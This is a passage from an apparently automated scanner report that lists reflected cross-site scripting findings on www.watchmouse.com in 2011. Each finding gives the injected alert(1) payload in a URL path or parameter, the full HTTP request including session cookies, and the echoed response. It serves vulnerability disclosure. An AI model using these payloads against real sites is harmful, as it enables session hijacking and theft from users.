The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1fd5"><script>alert(1)</script>f3be7babcd4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/jsf1fd5"><script>alert(1)</script>f3be7babcd4/ui/ui.draggable.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:58 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-3f28ab8c1ff92a707244c29ba76cd10c"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/jsf1fd5"><script>alert(1)</script>f3be7babcd4/ui/ui.draggable.js" method="post">
...[SNIP]...

1.48. http://www.watchmouse.com/assets/js/ui/ui.draggable.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/ui/ui.draggable.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9c82"><script>alert(1)</script>9dcf3277483 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js/uid9c82"><script>alert(1)</script>9dcf3277483/ui.draggable.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-f37aabf24689396ef9308b86d0c7ffcd"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js/uid9c82"><script>alert(1)</script>9dcf3277483/ui.draggable.js" method="post">
...[SNIP]...

1.49. http://www.watchmouse.com/assets/js/ui/ui.draggable.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/ui/ui.draggable.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload add3d"><script>alert(1)</script>99972ef1835 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js/ui/ui.draggable.jsadd3d"><script>alert(1)</script>99972ef1835 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:27 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-f81be43af20f853f8e8ea020b5b20671"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js/ui/ui.draggable.jsadd3d"><script>alert(1)</script>99972ef1835" method="post">
...[SNIP]...

1.50. http://www.watchmouse.com/assets/js/wm.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/wm.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e191"><script>alert(1)</script>1b9e196d000 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets7e191"><script>alert(1)</script>1b9e196d000/js/wm.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297196240.1

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:38 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-e6109843fcc5f91be51f64ed4a9ff312"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets7e191"><script>alert(1)</script>1b9e196d000/js/wm.js" method="post">
...[SNIP]...

1.51. http://www.watchmouse.com/assets/js/wm.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/wm.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b55d0"><script>alert(1)</script>63d1994de38 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/jsb55d0"><script>alert(1)</script>63d1994de38/wm.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297196240.1

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:52 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-80104cbdf4a0750fa9c7bcb3e9867713"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/jsb55d0"><script>alert(1)</script>63d1994de38/wm.js" method="post">
...[SNIP]...

1.52. http://www.watchmouse.com/assets/js/wm.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/wm.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcbe1"><script>alert(1)</script>71c5a05fb39 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js/wm.jsbcbe1"><script>alert(1)</script>71c5a05fb39 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297196240.1

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:02 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-5c94cf5661d033a0d182423b19d4cf74"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js/wm.jsbcbe1"><script>alert(1)</script>71c5a05fb39" method="post">
...[SNIP]...

1.53. http://www.watchmouse.com/assets/w3c/p3p.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/w3c/p3p.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c8e8"><script>alert(1)</script>09f388dda2d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets8c8e8"><script>alert(1)</script>09f388dda2d/w3c/p3p.xml HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:55 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-dde0dca617f3cc607c8c2b7267f44b5c"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets8c8e8"><script>alert(1)</script>09f388dda2d/w3c/p3p.xml" method="post">
...[SNIP]...

1.54. http://www.watchmouse.com/assets/w3c/p3p.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/w3c/p3p.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd9d2"><script>alert(1)</script>ae73e160242 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/w3cdd9d2"><script>alert(1)</script>ae73e160242/p3p.xml HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:04 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-9e7acfc070962e5c79c83e3ea7c129d6"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/w3cdd9d2"><script>alert(1)</script>ae73e160242/p3p.xml" method="post">
...[SNIP]...

1.55. http://www.watchmouse.com/assets/w3c/p3p.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/w3c/p3p.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af689"><script>alert(1)</script>bb6f803617a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/w3c/p3p.xmlaf689"><script>alert(1)</script>bb6f803617a HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-525207aa4400ec19b8b97807565b4bdf"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/w3c/p3p.xmlaf689"><script>alert(1)</script>bb6f803617a" method="post">
...[SNIP]...

1.56. http://www.watchmouse.com/chat.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /chat.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e089"><script>alert(1)</script>29c47b881dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /chat.php1e089"><script>alert(1)</script>29c47b881dd HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.8.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:52 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-b655026f2a7a50b943cec4c2a51e68f4"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/chat.php1e089"><script>alert(1)</script>29c47b881dd" method="post">
...[SNIP]...

1.57. http://www.watchmouse.com/de/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/

Issue detail

The value of the 3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9192"><script>alert(1)</script>1f1c7aad21b was submitted in the 3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /de/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=1f9192"><script>alert(1)</script>1f1c7aad21b HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:08:55 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-de-2a296d48f3e1c338fa1ae7efd966292c"
Content-Language: de
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/de/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=1f9192"><script>alert(1)</script>1f1c7aad21b" method="post">
...[SNIP]...

1.58. http://www.watchmouse.com/de/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee32d"><script>alert(1)</script>e458848d283 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /deee32d"><script>alert(1)</script>e458848d283/ HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:57 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-85773b95d2864b6570355fc42dbd9f01"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/deee32d"><script>alert(1)</script>e458848d283/" method="post">
...[SNIP]...

1.59. http://www.watchmouse.com/de/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e97e"><script>alert(1)</script>dfef8dfc3c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /de/?8e97e"><script>alert(1)</script>dfef8dfc3c2=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:08:54 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-de-26a6a2ac297c81238f4b123e18021f1f"
Content-Language: de
